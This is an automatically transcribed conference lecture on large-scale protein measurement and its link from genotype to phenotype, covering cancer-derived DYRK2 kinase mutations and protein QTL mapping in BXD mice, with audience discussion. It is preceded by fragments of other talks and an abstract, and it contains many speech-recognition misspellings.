engineer in my team and a Liam PhD student as well as a former PhD student for the GRAL program and an engineer as a physicist we work with at UPMC, but he didn't contribute to this work, but a very good collaborator as well. I thank you for your attention.
|
Probing the dynamics of complex microbial communities using DNA tridimensional contacts A fundamental question in biology is the extent to which physiological and environmentally-acquired information can be ransmitted from an animal to its descendants. I will present an example of trans-generational epigenetic inheritance where a temperature-induced change in gene expression lasts for less than 10 generations. I will also present an example of an inter-generational effect whereby the physiological state of an animal (it’s age) has a large influence on the characteristics of the next generation.
|
10.5446/50903 (DOI)
|
Okay, good morning. Thanks for showing up early. We are a technology laboratory and we work with proteins. We try to measure proteins. And it is an interesting question right now and I'm actually pleased to be here because I also forced me to think about some things which we normally don't. Think about how do genomes and cell fate relate to each other and what role do proteins have to play in this equation. I think they have a large role to play and I'll try to give first a little bit of general consideration and then I will point to a few issues where we think proteins can contribute. I think we live in a very interesting phase. This was a very interesting meeting to me to see some of these very intricate, extremely complicated mechanisms like trafficking that have been studied for decades and then there's the other world where people generate a lot of data and I think we need to somehow bring these two worlds together. This is kind of the topic of my talk. So we are a technical laboratory and I don't want to talk about techniques. I just want to give kind of a status report to calibrate the expectations and the capabilities. So if we are, we have focused in the field of protein measurements for a long time to exhaustively measure as many proteins in a sample as possible and as I can say this has now been achieved, we can probably measure virtually any protein in a sample. There's a few glitches here and there but that works well. If we want to relate genotype and phenotype this is not sufficient to measure one proteome we need to work with cohorts because then only then can we start to see how system reacts to specific changes, for instance genomic changes. So there has been work ongoing to get to a stage where genomics has been for a long time and that is to have a large number of samples, conceivably hundreds of samples and have many analytes, preferably all of them, in this case proteins, and to measure them reliably, quantitatively, in to generate the data matrix that has no or very few missing values. So this has been a huge challenge. I don't want to talk about why this has been a huge challenge but recently in the last few years we and other groups have developed massively parallel mass spectrometric techniques that are kind of equivalent to next generation sequencing which allows to sequence many peptides at a time and basically cover, reproducibly cover, a set of the protein, a subset, we cannot cover the whole proteome at this time in many samples but to do a certain subset, several thousands of proteins with very high consistency and quite fast. So this is the kind of experimental basis that I will take off from. So we can say that each sample, let's say this may be a cell extract, this may be a tissue extract, a biopsy sample, is converted into a single digital file by mass spectrometric technique which I'm not going to further discuss. This is fast. It goes from, if we could take for instance in the clinic a biopsy in the morning and have the results in the evening. We can do about 20 such samples a day with one machine. This is quite fast also in view of genomics but we cannot do the whole proteome, we can do about 5000 proteins in a sample. But with very good CV, with very few missing values if you have a cohort, and it is the sample, the measurements are quite precise and so we can think of it conceptually like about 50,000 western blots per sample. So this is kind of what we're doing. This is also applicable to modifications and protein interactions. So this is where I would like to start and this is kind of the technical base without explaining how this works and I'm happy to do this if someone is interested. So now if you read the literature and these large scale genomic efforts, we read that we can do thousands of genotypes, can be measured in a cohort. Sometimes these are international consortia and for instance cancer versus control is one of the most dominant areas where this is applied. And of course we have also a lot of quantitative phenotypes from imaging, from the clinics and from diagnostic tests. And so the big question I think this is one of the questions of this session in Tensu Address is how do we make a link, how do we make projections from the genotypic variants that are existing in a population in a cohort towards a phenotypic space and this in the clinical sense of course is healthy or disease, but it could be any, it's a general problem of course could be any phenotype. So we would like to predict phenotypes from their molecular origin which mostly is based on genomic data. So if you want to make predictions this is of course one of the hallmarks of science and there is many fields engineering, physics which has developed a very high level skills, how to make predictions based on models. So I use just this clock as an example as a system which is precisely understood and where we can make fairly precise predictions. So we know if we know the state of the system at a particular time, this clock, and if we know some of the parameters then we will be able to say for virtually any time in the future where the clock will be and because that's basically the purpose of a clock. We can also predict quite precisely how the system reacts if we change something in it. For instance, if we make the pendulum a bit longer we can predict what effect this has on the readout up here. So this works well for systems with a moderate number of parts and the basic model how they interact. And so this is of course very rather straightforward system and I would just say there is equations, which first principles we can plug this in, we can plug data, we can play in a computer with parameters and then we will get a fairly precise outcome assuming that this system operates under idealized conditions. For instance, it disregards friction of air and so on. So in biological systems we also try to of course get to predictions to generate predictive models but we have seen over the last few days and this is actually discussed quite extensively on, for instance, Tuesday evening in the discussion that this is very difficult to achieve and so there were terms or statements were made that this is usually equated to systems, biology and the terms or statements were made that this has been disappointing. And I would agree with that but there are some success stories where really quite well predictive models have been established in biology, oscillator, bacterial motor is one of the toy and really well studied problems, cell cycle regulators. But I would say this is, I would also agree that this has been disappointing from the point of view of generality that we can make general predictions. So good predictability has been achieved in these relatively limited samples but they are relatively simple. There are generalized models, they would be have a hard time to explain perturbation somewhere else in the cell, how for instance bacterial motor acts the chemotactic motor. If the cell receives two independent signals, it is hard to predict from these models and they are presently not scalable to really complex systems like trafficking or other situations that were discussed in this conference. So while there has been successes, the way how this approach, a very highly mechanistically driven approach based on the understanding of the wiring and the components of a system can be scaled to larger systems is a huge challenge. And here I just want to make the point how big the challenge is if we want to go from something very confined like a bacterial motor to making statements about a whole cell. So here a while back we worked together with the group of Jörg Baylor to do basically a molecule inventory on a cell which has also been featured quite prominently in this symposium and this is an S-pompy cell. So we tried to use what was at the time the best methods we had available to precisely quantify, basically count the RNA molecules, the transcripts and the proteins in cells that were grown, pumpy cells that were grown at different conditions, basically in a starve condition and an exponential growing condition. And this was, I mean to us certainly to me these were astounding numbers. So we could see that a gene produces between 30 and about a million copies of proteins per cell. So it covers an enormous dynamic range and of course the question will be how is this dynamic range maintained and how is it regulated. The median protein number is about 4,000, not quite 4,000, and the median mRNA copy per cell was about 2.5. This to me was extremely surprising numbers because this basically means this operates entirely in stochastic domain. So you must have cells if you have a population, some have none, some have maybe three, some have five, and if we then make predictions from let's say transcript measurements, if we put weight on an increase from two to four transcripts, we have to ask of course what that means because we operate the stochastic domain, but here we don't. Here in the protein level we don't because there's not going to be cells present that have zero protein and others have 10,000. They will always have some variation around of course these 4,000, but the mean there's very few cells that have none. So it already indicates that we operate probably quite from a conceptual in a different domain if we work with transcripts and proteins. The total amount of RNA molecules in these cells was about 40,000, which is basically not many and means that from an energetic point of view it's very cheap to make these proteins whereas there's almost 100 million protein molecules in each one of these cells which means to maintain those, to control those is very expensive for the cell. Another issue which is often times not really considered is that the protein concentration in these cells is more than 300 milligrams per millilitre. This is about a third of what crystallographers achieve when they squeeze the proteins into a crystal to do X-ray diffraction. It's enormously high concentration, actually it's a miracle or it's astounding that the proteins do not crash out because any biochemist knows if you want to extract these proteins from the cell and you do in vitro experiments if you go beyond let's say 10 milligram per milliliter the proteins tend to largely precipitate out. So how the cell maintains this concentration and can carry out its functions is actually an astounding feat which I think is not so often considered. Most of the vitro biochemistry, reconstitution experiments and so on are done at about two orders of magnitude concentration is below what actually happens in the cell. So that just to indicate that if we talk about cells, we talk about a very complex system and these classical mechanistic models have a very hard time to reach any kind of comprehensive prediction of this model here. So now, then given this situation and coming back to the question kind of posed or I understood to be posed for this morning was how are we doing, we can ask how are we doing to predict phenotypes from genetic variation which can now be very precisely measured. And the answer is we're not doing well at all and this is not just of course our group, this is the general, we have great difficulty to make this link. So we can ask a few questions and which are simple questions which we should be able to answer but we can't. And I think if everyone is here who would, when should we say that they generally have an answer to these questions and that would be very good to hear. So we can for instance not say, we cannot predict accurately what the effect of any inherited orthomatic mutation is on the phenotype. We can take a particular bacharot genome because it should have a model where we introduce a mutation, anywhere, let's say in a coding sequence, it should predict what effect it has and this has not really been achieved. We do not know how two or more mutations combine, do they cancel each other out, do they synergize, are they neutral? We do not know how the same mutation affects different individuals which is a huge issue in medicine, particularly in this emerging field of personalized medicine. And we also don't know how copy number variations in an individual are processed. So these are seemingly simple questions which we should be able to answer and I believe that before we can answer any of these questions with some kind of a path to answering those, it is presumptive and maybe too early to really go into the clinic and try to make statements about genotypic variability and its clinical outcome. With the exception of course of some Mendelian traits where it is very clearly understood what the molecular basis is and how this translates into phenotype and most clinical phenotypes are not so simple. So to summarize this part, I think we are operating in an interesting time in life sciences and we operate and try to summarize this in this graph here. So we have an axis that indicates the data that is available and I indicate the y-axis, the amount of first principles or theory that's available for the field. We have certain fields like engineering, health technology like the biotech or biomettech, people who make a device for instance to monitor heart rate or blood pressure which are in a very comfortable position because it's essentially engineering, there's a lot of theory, there's a lot of first principles, thermodynamics, electrodynamics and so on which are used very widely and work extremely well. So for them it is relatively straightforward with a limited amount of data to get to a predictive model. In biology we don't have this luxury, we have very few first principles, I come to this just in a second, but we have now increasingly a data and of course we also heard completely different types of data that exist and are generated from cell biologists, from imaging that we're labeling and you can follow a specific molecule, exactly where it goes, how its amplitude varies and so on. So this is also of course enormously dense data, so we operate now in life sciences medicine in a space where we have a lot of data available. But how this data generally in this genotype to phenotype space relate to each other is to me a big question and I'll come back to this, I think correlation, simply correlating data is not going to work. So we have to find a way how to translate this data in predictive models and this is the topic that I'm going to address in the following of my talk. We incidentally have whole classes of scientists or people who have very highly influential and important roles in society, doctors, lawyers, CEOs, politicians that have neither, they neither have a theory or first principle how the system actually works, nor do they have data that they can actually do tests and can do any experiments. I mean a doctor cannot have basically clone the patient and do experiments or treatment of some type or some and not on the others. So they have basically to accumulate an empirical base which they apply, but at least in the life sciences we are now in a domain where we can use empirically acquired data from strategically positioned data sets that help us to make predictive, hopefully accurate predictions. So what are the first principles that we use in biology? We do not have models like the physicists do where you can vary parameters and it simulates and makes an accurate prediction. We have some principles that we can apply. For instance we have Mendel's law, Mendelian inheritance, we have the principle of Avery, DNA as a transforming principle, this of course is now taught to every undergraduate student, we have the one gene, one protein, one function, notion from Biedel and Tatum, we have central dogma, we have Linus' polling, I think this is an extremely important insight, the idea of a molecular disease that a particular mutation in a particular gene leads to a change in the protein, in a change in the structure of that protein and that manifests itself as a complex phenotype, cyclical selenemia, we have the notion that proteins only function if they have a three-dimensional structure and of course we have the most recent principle, which I think is a fundamental principle that we need to consider in this phenotype, the genotype or relationship, that proteins are basically of a modular biology, that molecules do not act by themselves but they act in modules or complexes or however one would want to. To call that. So we try to come up with a concept that would integrate many of these principles and is experimentally addressable. So we call this the prototype model and we, this is our notion that we are pursuing experimentally, that if we were able to define this measure, this term or this entity, the prototype, we would have an extremely informative entity that is fundamental to the translation of this genotypic variability and phenotype. So how do we define this prototype? We define it as the composition of the proteins in a cell, basically the inventory and the way they are organized in modules. So this addresses many of the principles that are monuments in life science research and especially that addresses the issue of Lee Hartwell and colleagues of a modular biology and it addresses the issue of that variation, that is happening, some energy, affects the structure and the function of these modules. This is Linus Pauling's principle. So we would postulate that if we were able to measure this prototype, we would be able to make a useful link between genotypic variation and phenotype, specifically we would predict and I will then expand on some of these points a little further, that this prototype, so the composition as well as the organization of the proteins is the result of complex processes in multiple layers that are poorly understood. We know that there is transcriptional models, there's models that predict how RNA interference or microRNAs affect gene expression, there's models that define translational control, and of course we have protein kinases that affect protein phosphorylation and I think for all of these levels there is information, but everyone would be hard pressed to integrate this into a computer in a model, and we would be able to understand the system and to comprehend the predictive system. And we think that the cell actually knows how to interpret all these, or to integrate the control events at each one of these levels, and basically generates one entity, this is the prototype, which is the result of control elements at various levels. We would assume that the prototype indicates the response of a cell, and we would assume that the cell has perturbation of genetics, I'll come back to this, and that the cell knows how to integrate or how to react, and if it can measure the reaction then we would learn some biology. We would further assume, this is basically the principle of beadland tatum and also from Linus Pauling, that the prototype determines the biochemical state and is therefore to be very close to defining phenotypes. Further, we do not ask what does the protein or gene product, gene or protein do, this is of course largely known, we know where kinase was for late certain residues, ubiquitin like is ubiquitinate certain residues, a protease, digest certain proteins, we know that, we can measure that in vitro, but I think the question we try to address is how does the prototype or the system respond to alterations, so it's not just that we want to say a certain element has a certain function, but we would like to see how does the system react if this function is changed, and then we would present this as a system, this prototype, which has different levels of resolution, eventually there will be a high level resolution all the way down to crystal structures or atomic level, but at the moment I think we have to assume that certain areas of biology are known in great detail and can be represented in very dense data and others are not, and I think the whole discussion about trafficking is one field where there is enormous amount of prior information has been accumulated and we would like to integrate this data into a larger representation at the level of the proteins. So this is kind of what we try to achieve and the considerations that basically indicate that we believe that it will be very hard to make inference or predictions from how genomic variability affects, for that matter also environmental insults affect the cell, if we simply do genomic measurements. So now in the following I would like to expand on a few of these principles with actual data. The first question I would like to address, how does the simple genomic perturbation affect the prototype? So now we go into an experimental design where we induce on another wise invariant genotype in a specific protein, specific mutations, and these mutations are derived from medicine, from basically they have been associated with specific disease, phenotypes particularly cancer. We ask how does, what effect does this, do these mutations have, if they are in the same gene but of different type, how do they affect the modularity, the composition of the respective protein module, and how, what effect do these changes in this module have on the cells, on the cells protein landscape. So the experiment is we express mutated forms of a protein and determine the effects of interactions and function. We use this, we use a protein kinase, DERC2, we use a protein kinase for that because it is easy to measure the reaction of, or the response of these mutations on this protein because the function of this enzyme is to phosphorylate proteins. We can simply measure whether it phosphorylates different proteins or none or additional ones if it is mutated. And we measure then the effects of these, of effects on this protein. So how do we end up with DERC2? So we have a computational postdoc in the group who developed a system which we call, which we call domino effect where she tries to combine the genomic mutations from cancer genomic data, this is a massive amount of data, more than 10,000 complete genomes from cancer tissue and normal adjacent tissue, and she tried, she tried to distill this down into protein, into mutations which very likely have an effect on protein function. And so she does that by basically statistical arguments looking at the, at the likelihood that the molecule is mutated at the particular site, and then she uses prediction tools like, do these two, do this mutation likely change the conformation of a protein or interaction of the, of the protein that is affected. And she came up with what she calls hotspot mutations, about hotspot mutations in 156 genes, which we have a fairly high likelihood that these proteins, that these mutations, if they were introduced in an otherwise invariant background, would induce a change in the, either protein folding, protein interaction. What does that mean, good work? How would you say? What information are used to distinguish different effects of even mutations? What was specific about that? What was, regarding this way of mathematics, there was some specific study? Yes, so the mutations have been all found in, to be, a mutation which has been found in genomic data says to be mutated in patients that have a certain type of cancer. So now we know that there's many of these mutations are, are, are not known to be significant, so there's tens of thousands of them, and she simply tried to categorize them in those which have likely an effect on the protein, on the basis of, first of all, frequency of occurrence, and secondly, that they occur in the folded protein in residues, which either indicate that the protein might be disturbed, or that an interaction of a protein with something else might be, might be changed. How do you get this information? How do you know this particular mutation? From, so there is, there is, I give some observation on this protein, but what we got? So I'm coming to experimental data. This was simply based on, on, on predictions, on structure predictions, and then, where you would predict the structure of proteins, and then, and then paint the mutation on this protein, and if it is in a region that is, is predicted to be interactive, it, it is, it is assumed to have an effect. Yeah, structure, structure, and doting predictions. Yes, yes. Which are of course not very precise, and I'll come to then some experimental data. Yes. How do you distinguish variants because you're a freak, variants polymorphism and causal, because... By the, by the frequency. So now this is the, the protein, one of these 160 or 159 proteins that came out, we then followed up. This is a protein kinase called DERG2. It is an interesting enzyme, it's a protein kinase. It acts as a module, and this is the kinase itself. One of the protein it binds to is a ubiquitin ligase, so it seems to be at an intersection of protein phosphorylation and ubiquitination, and then there's two other proteins here. So it is a, the core is a tetrameric protein that we want to study. So it is, it has a number of disease associated mutations. It is a tetramer, and some of the subunits as individual proteins have been crystallized structures known. So now we select it of 80, there's an 81, in this genomic data set, there's 81 mutations that have been mapped to this protein. Some of course have no disease association, some do, and then Maria filters this down to a number, a small number of modifications. As we test now, there is a truncation where the C-terminal tail is cut off. This is an event that happens relatively frequently in cancer. We have two point mutations at the site where the truncation happens. We have a mutation which is in the activation loop of the kinase, and therefore affecting, like it affects its activity. We have a mutation in the catalytic site, thought to render it invariant, and there's a mutation here in a region which we don't know what it's doing. So the all these mutations which are labeled here and affect, which are all not reamed up, they've been occurring frequently in patients with certain disease. We were introduced, this is the work of a postdoc Martin Menert, and he generated cell lines that express the mutated form of this respective protein. And then we measure the interaction around the core. So we see that each mutation, even though they may just change a particular residue somewhere in the protein, which we don't really know what its function is, each one of these proteins has a different, each one of these mutations have a different effect on the module. So this would be, the way we read this graph is that this is the mutation, this happens to be the one which renders the kinase inactive, and these colors are the three interactors of the tetra-manic core module. We see if we inactivate the kinase by mutation, there is substantial fall of or reduction in the binding of some of the subunits. There's some mutations which have very little effect, but each one does have an effect on the interaction. And so they all perturb the module in some way, some more, some less. And as expected, the biggest change that is occurring is the truncation mutant, where the C-terminal part is missing. This is fairly plausible. So what we know so far, the DERC two mutants, which have been derived from clinical information, show significant but varying impact on the assembly of this kinase core complex. How do you measure interactions? So we use two methods. One is affinity purification mass, where we tag the proteins and pull them out and do interactions. And the other is called BioID, where we express a mutified protein, and it basically labels chemically the surrounding proteins. And the results of the two are not quite identical, but they largely converge. And the related question is, is this in the context of the wild type proteins? So this is expression on top of a wild type or a knock-in or a... So this is expression on top of the wild type protein. I'll then come to a knock-in in a second. So the message so far would be that oftentimes we would say, okay, a mutation affects this gene. The gene is maybe eliminated and... or somehow modified, and we would then like an inference from this mutated gene to phenotype. And what I tried to show here is that each mutation has... even at this level of the organization of this protein with its core module has different effects. Does it act as a dominant negative on the endogenous one? No, it's just expressed on top. Yeah, but it doesn't affect the endogenous activity because it will take the substrate? No, it doesn't because the endogenous is basically transparent to these techniques. It could be that there is titrations or that if you express a tagged protein, it mobs up into interactors. It changes the equilibrium. Yes? It seems to me that what we're doing is allowing nature to do the mutagenesis. And then there was a phenotype that came out because we had the patients, you're marking that. There would have been an equivalent that I would have actually started from scratch than my mutagenesis and my protein, and then get my readouts, right? Yes. Right? So it's just allowed evolution to do the experiment for me. So these are mutations that are filtered, and of course we don't say that these mutations cause cancer, but they are statistically associated with certain tumors. And what I'm trying to do here is to say these mutations that have occurred through evolution or selection in the cancer, even though they affect the same gene, they usually lump together, they have an intricate and idiotypic effect on this module. And if you believe what Linus Pauling's theory was of molecular disease, the mutation affects the structure and the function of a molecule, then this means that each one of these has an idiotypic footprint. Right. And that's, to me, that's the same experiment I would have done in the laboratory when I forced, let's say, I'm doing a screen of mutants, right? I mean, I can, let's say I could just drive mutagenesis and select for it. Yes, of course. But we try to, we try to, we try to make arguments that we, we try to find ways to use the genomic variability which is associated with disease like cancer, and to, and to help making the link from these, to playing these mutations under relation to the phenotype. Of course, you could take any gene and you could mutagenize it and you could see what happens, but that's not quite the question we ask here. Because there will be no phenotype in your experiment. Why? That's not true. What will you make? Well, let's suppose, no, let's suppose I'm working on a platter, and I'm working on those acrocytes, and so I have a reader which is going to be a certain phenotype. It happens to see, it's not disease, but it's a failure to internalize. And in my mutagenesis, I accelerated it because I've done the lab. I get the mapping through the protein and then I cluster, you know, the properties. Yes, of course, this has been done. I'm not here in nature to do the experiment for you. Of course, it's been done. But there's a big difference. Is that you are in nature, and therefore there is no, when you are in the lab, you work in an isogenic background. Not necessarily. It depends. If you do genetics, generally what you do. And here, that's the first thing you do. And second, you can exactly start to work on your mutation when you have isolated the phenotype. That means that you don't let the systems evolving further to generally, in cancer, you don't have one mutation. You have many mutations that probably are, the first is the one that might have caused the cancer. The second one is the one that's allowed to survive the first mutation. So you have a very long evolution of a complex pattern of... I understood that. But I still, conceptually, I don't understand the difference. I mean, I'm just, to me, the difference is in one case, I allowed millions of years to do this. Whereas in the other one, I just did it as celebrated. So maybe because I'm doing a celebrated, I have less time to do the more spread thing, or maybe I'm doing less subtle phenotypes. Yes, so I agree. If you work in the yeast or with flies, of course, this has been done a lot, even with mice. There's been huge consortia that basically do mutagenesis and see what phenotypes arise. And I would just like to make the point here that if you then say the gene was mutated, that this is not sufficient granularity to make, eventually, mechanistic link, because different mutations, even in the same gene, in a particular genetic background, have very different effects on the modularity, as I will show now, also on the function. But I think it has a much more fundamental effect, is that when you do that in the lab, you are looking for a strong phenotype. So I have done experiments, for example, where I'm looking at a particular pathway. I do have a per-turbation in my gene, and then I actually see compensations in the system. And sometimes you don't even, actually, we don't actually see a readout on the phenotype. The compensation is such that you don't see a readout. But since I know the module, as you are pointing out, I'm looking, let's say, at the level of expression of some other proteins, and then you see there was compensation, let's say. There was no phenotypic readout, right, because the system compensated, right? This is generally a rare case. In general, when you do experiments in the lab, you go for the strong phenotype. And what is remarkable is that when you look in nature, you never have the same mutations. Okay, maybe we'll continue later. Sorry. No, I mean, there's no way that there was a difference. Do anything people. You cannot do the lab experiment with people. Yes, but I think the principles that we're trying to elaborate here also apply to mutations that are generated by random mutochats. But the point is it's not unexpected, because if you're looking at a very specific function, I mean, this mutant P192 rubber is a bit... Yes, so I was just trying to say that various mutations which have been selected and been through statistical arguments associated with the phenotype, that they affect the protein differently at the level of organization, and now we ask what does it do at the level of its function, which is to phosphorylate other proteins. And so we can find on this protein a number of phosphorylation sites. We measure them and we quantify them, and we can see that again, each mutation has, for these proteins, these few phosphorylation sites on the protein that are measurable, have a different pattern. So not only does the mutations have been selected and expressed, affect the wiring, basically the modularity, they also affect the phosphorylation state of the protein, and then we also carried out, this is now a knock-in experiment, where we carried out and studied to see how do these mutations, which presumably perturbed modules, affect the overall function of this, basically the landscape, the number of the phosphorylation landscape or pattern of this protein. So the experiment was to take cells, to knock out with CRISPR-CaST, the intrinsic kinase to knock in, then the mutant forms of these kinases, then they're expressed, and then we isolate proteins from these cells, we purify phosphopeptides, and we analyze these phosphopeptides in a mass spectrometer. So we generate about 1200 or so phosphorylation sites in all these mutants, and by simply clustering these phosphorylation patterns look quite similar. So that means that these subtle mutations in this protein do not radically change the overall protein phosphorylation landscape, which of course is expected, because in the same cell, they have hundreds of other kinases active at the same time. But when we start to look more closely, which phosphorylation sites are affected, and we focus on this panel over here, we see again the various mutants, these are now knocking mutants, there's no more wild type kinase, and we see that there's a set of proteins, about 30 to 40 phosphoproteins in phosphorylation sites, which are changing in response to the various mutations, and these phosphorylation patterns change again in idiotypically dependent on the type of mutations. We see the complete knockout, this is the most strong phenol footprint here, this is the second to last, we have the deletion mutant, the C-terminus is deleted, this is similar, this is strong, but not as strong as the knockout, and then we have the kinase dead mutant, which is the third one from here, which is again similar to the knockout, but not identical, and then we have the other mutations, which either affect different residues, which have a footprint on the phosphoprotein, which is detectable, which affects specific proteins, but not as strongly as the absence of the kinase. So we can of course then look what do these proteins do, and this would then provide a link to the activity of this protein, or its modified form, the effect of a mutation of this protein on specific phosphoproteins, and if we assume that phosphoproteins are, phosphorylation is responsible for modulating the activity, we can say that specific mutations in this single protein, DERG-2, mutations which have been coming through, selected through, basically through evolution, have effect various areas of the cellular physiology. For instance, some map to methyl transphases is an epigenetic complex. We have this protein here, a scaffold protein activated with GTPases, so this is probably people who know a lot about this protein, nuclear pore proteins, which we also heard a lot yesterday, and cell cycle regulating proteins. So what we conclude is, from this, is that if we take a number of mutations that have been selected to be related to disease, and if we introduce these mutations in this protein, in a cell, in otherwise isogenic background, they affect both the organization of this module and its function, and they do it in a highly modulated way, and the function of this protein complex, which is a kinase, affects different parts of the cell's physiology. So this points to a lot of complexity of how these mutations mechanistically affect physiological processes. So this is basically what we conclude from this, and I would, the overall conclusion, the complexity of the cellular response to a simple genomic perturbation, one mutation, is beyond the reach of mechanistic models, because we have no good way to predict a priori which parts will be touched by, for instance, a kinase, or a ubiquitin ligase, or a protease, that's mutated. Okay, so now, see, I'm getting, of course, very late, we, I won't get through, so we'll see, then we would like to, yeah, that's fine. Yeah, but I made a note. So I won't get through the third part, of course, which is actually also, well, anyway. So now, we, I would like to extend this to a situation, now we have basically had one background, one mutation, ask what happens. And now we would like to go to more natural situation, where we say we have a number of genetic variants in various, in a population, and we'd like to ask, to what extent can we use this natural variation to make linkages, eventually mechanistic linkages, for predicting a phenotype. So this is usually discussed controversially, and because there's a lot of people, like those here, who are very famous article by now, who expunges the idea that we don't need to have any hypothesis anymore, we don't really need to understand mechanisms, correlation is enough. So the idea is, if you pile up enough data, measure enough genomes, do genome, GWAS studies, with enough cohort size, we will not need to make, to understand the underlying mechanisms, we can simply make correlations and make statements. So this is widely used in, also in clinical circles. And I'd like to show that this is probably, well, almost certainly an all underestimation of the problem, and that correlation will not be enough. So how do we show that? If I may, it's used as markers, biomarkers, we should say. It's not meant to be a mechanistic model, it's just, if you have 100,000 people, with this, this, this, this, this, and this mutation, and there are these diseases, or these, whatever, these stages of the disease, you can say there are good chances that if you have someone with this, this, this, this, but it's only biomarkers. It is, and it's risk, it's not even a market, it's risks, and I think we know from these, now very large, I mean some of these large GWAS studies are now hundreds of thousands of individuals have been genotyped, and what of course comes out is that there is the larger the cohort, the more genes show a small signal in these Manhattan plots, and so they produce, there's additional genes or mutations in genes associated with a complex disease, but they are very, very small contributions. How these contributions can be used even clinically to make a risk assessment is actually very difficult. I think this is a philosophical point, I think one needs to eventually, if one wants to do a risk assessment or treatment decision, know something about the mechanism. Yes. So we now would like to explore, we'd like to explore how likely this, or how can we use systematically collected data sets in populations and mechanistic insights and prior information to learn something about the system. So this we do, we would like, this is the outline, and this is the system we use. This is, and we use this system because we think before we can make any headway into, in a system which has controlled known genomic variability, we'll have a very hard time to go to outbred human population. So this is an interesting collection of mice, mouse strains which has been generated by an international consortium, we certainly have not contributed to that with the beneficiaries of it. And there were two mice, a C57 black mice, mouse and DBA mouse were crossed. And then there were, so there were F1 generation and F2 generation was generated and out of that there were strains outbred which are, each one of these strains is genetically identical, they're inbred and they all have the property, the genomes of these strains have the property that alleles from either the one parent or the other have been distributed in these strains and there's about 180 strains of that. So it's a terrific resource because we know the genetic variability, it is limited in the sense from the alleles that are present, but the distribution of the alleles is of course different from strain to strain. So we have used these strains and in an experiment, this is an early phase with now a large, larger data set which I don't want to discuss, but we selected 192 proteins which are relevant for metabolism and selected them for quantification across this cohort. So this they cover some metabolic pathways. We took 40 of these strains which were grown either on normal food or on food that makes them fat, so this is an external perturbation. We have a genetic axis which is a genotype which is known, we have an environmental, a diet axis and we did this for 40 strains. So for 40 strains we measure in duplicate under two conditions, high fat or low fat and about close to 200 metabolic proteins. And then we want to see how this data set can be related to learn something about the genetic effect or the environmental effect on the behavior of this pathway. So this is just showing that the data looks good. This is the data table, so this is what I said at the beginning. We have now the ability to measure precisely quantitatively number of proteins across cohorts. These were rather, for today's terms, somewhat low number, focused on to make the point it's efficient. And so we can now link using QTL mapping, quantitatively trade locus mapping. We can now make a link between the presence of a particular allele at the locus and the abundance of a protein. So this is referred to as protein QTL. So we assume that one allele causes the protein to be more highly expressed than the other allele from the other parent. And since we have a sufficient number of these measurements, we can relate the presence of a particular allele to the abundance of a protein and it's referred to as QTL mapping. So what we see here is that we identify 44 from these 197 or 92 proteins, 44 QTL. So these are low size over which the allele affects the abundance of a protein. Some are insist that means they affect each other. I mean the locus affects the product from this locus and some are trans that the locus affects the abundance of a protein that's coded for by different locus. So this is not super interesting or super remarkable, but when we also measure EQTLs, these are the transcripts which are also measured in these mice. We see that we have a rather similar number of QTLs, links between the allele and the protein, but they have a different behavior. So in the different behavior is that proteins QTLs act more likely in trans than the transcript QTLs. That means the transcript regulation is less diverse in the cell than the protein regulation by genetic means. I don't get into the effects of the environment and now we try to learn something about using this data plus Brian knowledge about these pathways to learn something that may be interesting biochemically or actually clinically. So one of the QTLs maps to an enzyme that is at the end, the last enzyme in the degradation pathway of branched chain amino acid like lysine or isoleucine. So these are degraded in stepwise manner, exactly as the Biedel and Tatum principle suggests and each step here produces a metabolite as an intermediate product. So now we have a QTLs, we have a genomic locus that affects the abundance of this respective protein here, this enzyme, and this is either high or it is low. Now we can correlate basically the enzyme presence here which we take as a surrogate for the activity and we can relate this to the metabolites up here. So we basically do something which is like a water hose where we say we close the water hose, we have less, we constrict it, we have less of this enzyme and we ask, do the metabolites up here pile up? This would be assumed and if there is lots of the protein, lots of activity down there, we would assume that then the metabolites up there decrease in abundance because they are processed. So this just shows that we can do this. So from the enzyme level, it is inversely correlated with these metabolites which are also measured by mass spectrometry. This is exactly the principle of this water hose constricted or open. We also see that two metabolites up here correlate very nicely so if one is high, the other is high, so that means the enzyme down here constricts the whole pathway. So we have now made a link between a genetic locus and the allele that controls the enzyme level to be the higher low and the presence and the abundance of metabolites. This is a mechanistic link because we explain this by the enzyme activity that is present here. Now interestingly enough, we can find then literature that says that this intermediate product here, amino adipate, is a small molecule that has been generated in the degradation of this enzyme has been found in a large cohort GWA study in the Framingham Heart Study as a biomarker for diabetes risk. So this is of course now an interesting case because it allows us to make the statement that through measurements, systematic measurements in genetically perturbed animals, we are able to find a link between a genomic variant in a particular gene and an enzyme abundance. And this enzyme abundance affects the path activity of a metabolic pathway, the degradation of branched gene amino acids. And if this activity is low of the pathway at the bottom, the intermediate pile-up and they are being found to be a risk factor for a complex disease. So do you know if the change is due to the DBA background or the Black 6 background? Because as far as I remember, DBA is most susceptible to diabetes density. Yes. Yes, so there is a whole range of actually disease phenotypic measurements in these mice and this is amazingly complicated. So there is from these mice, these BXD mice, there is about 300 phenotypes have been measured, including some disease phenotypes. And many of these phenotypes are quantitative, so you can say you can assign a numeric value to them. And in every case I've looked at is that the parents, the DBA or the Black 6 are somewhere in the middle, so you can basically list, make a plot of the numerical phenotypes from strain 1 to 180 and the parents are always somewhere in the middle and they create offspring through the reorganization of the alleles that are far outside the range of the parents. So this is of course outside Mendelian inheritance and this is for all of these quantitative phenotypes that are measured is actually the case. Yes. Yes, no, I'm... Okay, so I want to summarize this part. I think the correlation of prototype and genomic measurements in genetic reference indicates very complex relationships between genetic constitution and eventual expressed information. We can... We can... We can, in very specific and simple cases, where there is a lot known about the mechanism, we can use this prior information and relate it to the big data set generated. It's not a super big data set that I showed, but it's a rather substantial data set. And we can then reach a somewhat mechanistic understanding and I think we need to find ways. This is a big challenge for the future. The systematically integrated large-scale data and mechanistic data like being generated by many of the biologists here work for years on a very complex biological system to then use these general principles as background and to determine how they are modulated, how this background is modulated in a specific case, in a specific genetic background or under specific conditions, and that can certainly be elaborated by large data sets. So my conclusion clearly is correlation is not enough. It is a useful tool, but if we think we can use simply correlation of large data sets to get mechanistic, biologically meaningful insights, I think this will not work. So I wanted to... I was planning to, but now I skipped this. I wanted to show that this... how the cell processes gene dosage effects and I don't have time to do this. I would just like to say, to summarize what it does, maybe I can summarize this in one picture. So this is basically... we collected a panel of cell lines which from the sequence are essentially identical or very similar to the Arhila cell lines. They're very frequently used in laboratories, 100,000 publications, but they are genomically unstable. And so sequent wise they're similar, but the genomic landscape is very different. So here we map copy number variation of these cell lines that have been collected from various laboratories, people do experiments. And so these are simply... we see that although they have the same name, these cells, and they're used in laboratories to do 